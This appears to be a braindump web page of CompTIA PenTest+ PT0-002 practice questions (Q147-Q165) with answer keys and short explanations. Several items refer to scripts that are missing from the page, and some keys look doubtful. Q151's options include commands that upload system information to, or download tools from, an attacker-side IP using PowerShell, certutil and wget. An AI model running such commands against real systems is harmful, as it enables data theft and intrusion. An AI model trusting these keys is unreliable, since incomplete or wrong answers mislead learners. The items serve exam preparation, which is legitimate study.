• Home
  • Articles
  • PT0-002 Tested & Approved CompTIA PenTest+ Study Materials [Q147-Q165]

PT0-002 Tested & Approved CompTIA PenTest+ Study Materials [Q147-Q165]

Share

PT0-002 Tested & Approved CompTIA PenTest+ Study Materials

Validate your Skills with Updated CompTIA PenTest+ Exam Questions & Answers and Test Engine


CompTIA PT0-002 certification exam covers various topics related to penetration testing, such as planning and scoping, information gathering and vulnerability identification, attacks, exploitation, and post-exploitation techniques, reporting, and communication skills. PT0-002 exam also tests the candidate's knowledge of legal and regulatory compliance requirements, standards, and ethical considerations. CompTIA PenTest+ Certification certification exam is vendor-neutral, which means it is not limited to a particular software or hardware vendor. A successful completion of the exam indicates that the candidate possesses the necessary skills and knowledge required to conduct a successful penetration test.


CompTIA PenTest+ certification exam, also known as PT0-002, is a reputable certification offered by CompTIA to validate your skills and knowledge in penetration testing. CompTIA PenTest+ Certification certification demonstrates that you can identify and exploit vulnerabilities to protect the organization's network and data from cyber-attacks. PT0-002 is designed for professionals who want to pursue a career in penetration testing or for those who want to enhance their skills in cybersecurity.

 

NEW QUESTION # 147
A penetration tester is testing a new API for the company's existing services and is preparing the following script:

Which of the following would the test discover?

  • A. Listening web servers in a domain
  • B. Supported HTTP methods
  • C. Default web configurations
  • D. Open web ports on a host

Answer: B

Explanation:
Explanation
The script is using the requests library to send an OPTIONS request to the API endpoint, which returns a list of supported HTTP methods for that resource. This can help the penetration tester to identify potential attack vectors or vulnerabilities based on the methods allowed.


NEW QUESTION # 148
A penetration tester needs to perform a vulnerability scan against a web server. Which of the following tools is the tester MOST likely to choose?

  • A. Ethercap
  • B. Cain and Abel
  • C. Nmap
  • D. Nikto

Answer: D

Explanation:
Explanation
https://hackertarget.com/nikto-website-scanner/


NEW QUESTION # 149
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

  • A. Burp Suite and DIRB
  • B. Nmap and OWASP ZAP
  • C. Hydra and crunch
  • D. Netcat and cURL

Answer: A


NEW QUESTION # 150
Which of the following is a regulatory compliance standard that focuses on user privacy by implementing the right to be forgotten?

  • A. GDPR
  • B. NIST SP 800-53
  • C. ISO 27001

Answer: A

Explanation:
Explanation
GDPR is a regulatory compliance standard that focuses on user privacy by implementing the right to be forgotten. GDPR stands for General Data Protection Regulation, and it is a law that applies to the European Union and the United Kingdom. GDPR gives individuals the right to request their personal data be deleted by data controllers and processors under certain circumstances, such as when the data is no longer necessary, when the consent is withdrawn, or when the data was unlawfully processed. GDPR also imposes other obligations and rights related to data protection, such as data minimization, data portability, data breach notification, and consent management. The other options are not regulatory compliance standards that focus on user privacy by implementing the right to be forgotten. NIST SP 800-53 is a set of security and privacy controls for federal information systems and organizations in the United States. ISO 27001 is an international standard that specifies the requirements for an information security management system.


NEW QUESTION # 151
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

  • A. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')
  • B. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe
  • C. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
  • D. schtasks /query /fo LIST /v | find /I "Next Run Time:"

Answer: B

Explanation:
Explanation
https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while
--- https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk


NEW QUESTION # 152
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?

  • A. Determine if the failover environment relies on resources not owned by the client.
  • B. Ensure the client has signed the SOW.
  • C. Establish communication and escalation procedures with the client.
  • D. Verify the client has granted network access to the hot site.

Answer: B


NEW QUESTION # 153
A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks. Which of the following methodologies should be used to BEST meet the client's expectations?

  • A. OWASP Top 10
  • B. NIST Cybersecurity Framework
  • C. MITRE ATT&CK framework
  • D. The Diamond Model of Intrusion Analysis

Answer: C


NEW QUESTION # 154
An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.
Which of the following is the penetration tester trying to accomplish?

  • A. Identify all the vulnerabilities in the environment.
  • B. Maintain confidentiality of the findings.
  • C. Uncover potential criminal activity based on the evidence gathered.
  • D. Limit invasiveness based on scope.

Answer: D


NEW QUESTION # 155
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
* Have a full TCP connection
* Send a "hello" payload
* Walt for a response
* Send a string of characters longer than 16 bytes
Which of the following approaches would BEST support the objective?

  • A. Perform a credentialed scan with Nessus.
  • B. Run nmap -Pn -sV -script vuln <IP address>.
  • C. Employ an OpenVAS simple scan against the TCP port of the host.
  • D. Create a script in the Lua language and use it with NSE.

Answer: D


NEW QUESTION # 156
Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team?

  • A. To determine any processes that failed to meet expectations during the assessment
  • B. To provide feedback on the report structure and recommend improvements
  • C. To ensure the penetration-testing team destroys all company data that was gathered during the test
  • D. To discuss the findings and dispute any false positives

Answer: A


NEW QUESTION # 157
During the reconnaissance phase, a penetration tester obtains the following output:
Reply from 192.168.1.23: bytes=32 time<54ms TTL=128
Reply from 192.168.1.23: bytes=32 time<53ms TTL=128
Reply from 192.168.1.23: bytes=32 time<60ms TTL=128
Reply from 192.168.1.23: bytes=32 time<51ms TTL=128
Which of the following operating systems is MOST likely installed on the host?

  • A. macOS
  • B. Linux
  • C. NetBSD
  • D. Windows

Answer: D

Explanation:
Explanation
The output shows the result of a ping command, which sends packets to a host and receives replies. The ping command can be used to determine if a host is alive and reachable on the network. One of the information that the ping command displays is the Time to Live (TTL) value, which indicates how many hops a packet can travel before it is discarded. The TTL value can also be used to guess the operating system of the host, as different operating systems have different default TTL values. In this case, the TTL value is 128, which is the default value for Windows operating systems. Linux and macOS have a default TTL value of 64, while NetBSD has a default TTL value of 255.


NEW QUESTION # 158
A penetration tester performs the following command:
curl -I -http2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?

  • A. Option B
  • B. Option C
  • C. Option A
  • D. Option D

Answer: C


NEW QUESTION # 159
A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities?

  • A. Single quote
  • B. Double dash
  • C. Comma
  • D. Semicolon

Answer: A

Explanation:
Explanation
A single quote (') is a common character used to test for SQL injection vulnerabilities, which occur when user input is directly passed to a database query. A single quote can terminate a string literal and allow an attacker to inject malicious SQL commands. For example, if the search form uses the query SELECT * FROM products WHERE name LIKE '%user_input%', then entering a single quote as user input would result in an error or unexpected behavior


NEW QUESTION # 160
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following combinations of tools would the penetration tester use to exploit this script?

  • A. Burp Suite and DIRB
  • B. Nmap and OWASP ZAP
  • C. Hydra and crunch
  • D. Netcat and cURL

Answer: D


NEW QUESTION # 161
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

  • A. Injection flaws
  • B. Ransomware attacks
  • C. Buffer overflows
  • D. Race-condition attacks
  • E. Cross-site scripting
  • F. Zero-day attacks

Answer: A,E

Explanation:
Explanation
A01-Injection
A02-Broken Authentication
A03-Sensitive Data Exposure
A04-XXE
A05-Broken Access Control
A06-Security Misconfiguration
A07-XSS
A08-Insecure Deserialization
A09-Using Components with Known Vulnerabilities
A10-Insufficient Logging & Monitoring


NEW QUESTION # 162
A consulting company is completing the ROE during scoping.
Which of the following should be included in the ROE?

  • A. Liability
  • B. Cost ofthe assessment
  • C. Report distribution
  • D. Testing restrictions

Answer: C


NEW QUESTION # 163
The following line-numbered Python code snippet is being used in reconnaissance:

Which of the following line numbers from the script MOST likely contributed to the script triggering a
"probable port scan" alert in the organization's IDS?

  • A. Line 07
  • B. Line 02
  • C. Line 01
  • D. Line 08

Answer: D


NEW QUESTION # 164
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address. Which of the following BEST describes what happened?

  • A. The penetration tester had incorrect contact information
  • B. The penetration tester was testing the wrong assets
  • C. The planning process failed to ensure all teams were notified
  • D. The client was not ready for the assessment to start

Answer: C

Explanation:
Explanation
Sinkholing is a technique used by security teams to redirect malicious or unwanted network traffic to a controlled destination, such as a black hole or a honeypot. This can help prevent or mitigate attacks, analyze malware behavior, or isolate infected hosts. If the SOC used sinkholing on the penetration tester's IP address, it means that they detected the tester's activity and blocked it from reaching the client's network. This indicates that the planning process failed to ensure all teams were notified about the penetration testing engagement, which could have avoided this situation.


NEW QUESTION # 165
......

PT0-002 [Jan-2024] Newly Released] PT0-002 Exam Questions For You To Pass: https://www.validvce.com/PT0-002-exam-collection.html

For your comfort, ValidVCE provides you the convenience of free CompTIA PenTest+ braindumps demo: https://drive.google.com/open?id=1MtlbPEAcIobYBKCDieTUZnEEit-KC9xl

Related Articles

more
CompTIA PT0-002 Certification Practice Exam

We are dedicated in providing the most reliable and latest vce dumps for certification exam, our valid dumps and free vce files will guarantee you pass test 100%.

Latest VCE Dumps

Useful Links

Contact Us

Our Working Time: ( GMT 0:00-15:00 )
From Monday to Saturday

Support: Contact now 

If you have any question please leave me your email address, we will reply and send email to you in 12 hours.

Copyright © 2026 ValidVCE NETWORK CO.,LIMITED. All Rights Reserved. All trademarks used are properties of their respective owners. Privacy Policy